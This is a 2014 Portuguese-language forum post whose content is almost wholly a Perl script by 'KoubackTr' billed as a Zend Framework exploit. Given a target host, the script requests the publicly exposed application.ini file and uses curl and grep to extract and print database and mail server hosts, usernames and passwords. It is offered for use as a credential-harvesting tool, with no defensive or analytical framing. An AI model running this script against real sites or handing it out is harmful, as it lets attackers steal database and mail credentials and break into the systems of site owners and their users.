Zend Framework application.ini vulnerability exploit
Publicado por Perfil removido (última atualização em 21/04/2014)
[ Hits: 33.943 ]
Perdoem meu inglês, kkk.
#!/usr/bin/perl # Zend Framework Exploit. # By KoubackTr # koubacktr@gmail.com # http://koubacktr.wordpress.com/ #=====================================================================# # This script exploits a vulnerability in the Zend Framework # # Through the exposure of the configuration file "application.ini" # #=====================================================================# # Este script explora uma vulnerabilidade no Zend Framework # # Atravez da exposição do arquivo de configuração "application.ini" # #=====================================================================# # Status: Em teste e adaptação // In test and adaptation # Libs use strict; use LWP::UserAgent; use Getopt::Long; use Config; use Term::ANSIColor; my $os=$Config{osname}; if($os=="linux"){ }else{ print "Ohh, this software run only in linux systems :( [DIE]\n"; die; } print color 'bold cyan'; print ' __________ .___ ____ ___ .__ ____ __ \____ /____ ____ __| _/ ____ \ \/ /_____ | | ____/_ |/ |_ / // __ \ / \ / __ | _/ __ \ \ /\____ \| | / _ \| \ __\ / /\ ___/| | \/ /_/ | \ ___/ / \| |_> > |_( <_> ) || | /_______ \___ >___| /\____ | \___ >___/\ \ __/|____/\____/|___||__| \/ \/ \/ \/ \/ \_/__| by KoubackTr || http://koubacktr.wordpress.com/ '; print color 'reset'; my ($target, $zend_path); my $options = GetOptions( 't=s'=> \$target, 'p=s'=> \$zend_path, ); unless($target){ print color 'yellow'; print "\t\t\t[!] Please, set a Zend target!\n"; print "\t\t\tUse EX: $0 -t <target> -p <zend/path/>\n\n"; exit; print color 'reset'; } unless($zend_path){ my $zend_path="/"; } my $APP="application.ini"; my $PATH="application/configs"; my $URL="http://$target/$zend_path/$PATH/$APP"; #// make a complete URL of application.ini my $u = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => $URL); my $resposta = $u->request($req); if($resposta->is_success){ print color 'red'; print "\t\t\t[+] TARGET IS VULNERABLE !! :)\n"; print color 'reset'; print "\t\t\t[+] EXPLORE DB CONFIG IN FILE... !! :)\n\n"; #// using curl for requet application.ini my $db_host= `curl -s "$URL" | grep 'db.params.host'`; my $db_adapter=`curl -s "$URL" | grep 'db.adapter' `; my $db_user=`curl -s "$URL" | grep '.db.params.username' `; my $db_pass=`curl -s "$URL" | grep '.db.params.password' `; my $db_name=`curl -s "$URL" | grep 'db.params.dbname' `; my $db_geral=`curl -s "$URL"| grep 'connection_string' `; #// Return and print config data print color 'cyan'; print "\t$db_adapter \n"; print "\t$db_host \n"; print "\t$db_user \n"; print "\t$db_pass \n"; print "\t$db_name \n"; print "\n$db_geral \n"; print color 'reset'; print "\n"; print "\t\t\t[+] EXPLORE MAIL CONFIG IN FILE... !! :)\n\n"; my $mail_type=`curl -s "$URL" | grep 'mail.transport.type' `; my $mail_host= `curl -s "$URL" | grep 'mail.transport.host'`; my $mail_port=`curl -s "$URL" | grep 'mail.transport.port' `; my $mail_user=`curl -s "$URL" | grep '.mail.transport.username' `; my $mail_pass=`curl -s "$URL" | grep 'mail.transport.password' `; print color 'cyan'; print "\t$mail_type \n"; print "\t$mail_host \n"; print "\t$mail_port \n"; print "\t$mail_user \n"; print "\t$mail_pass \n"; print color 'reset'; print "\n\n END!\n"; # Make a new request for get new lines and configuration of file. :p # ... } else{ #// The target is not vulnerable, sorry print color 'bold green'; print "\t\t\t\n[!] TARGET IS NOT VULNERABLE :( (BYE)\n\n"; print color 'reset'; } # END # # # KoubackTr - 2014 http://twitter.com/kouback_tr_ # irc.anonnet.org 6667 #Loc #
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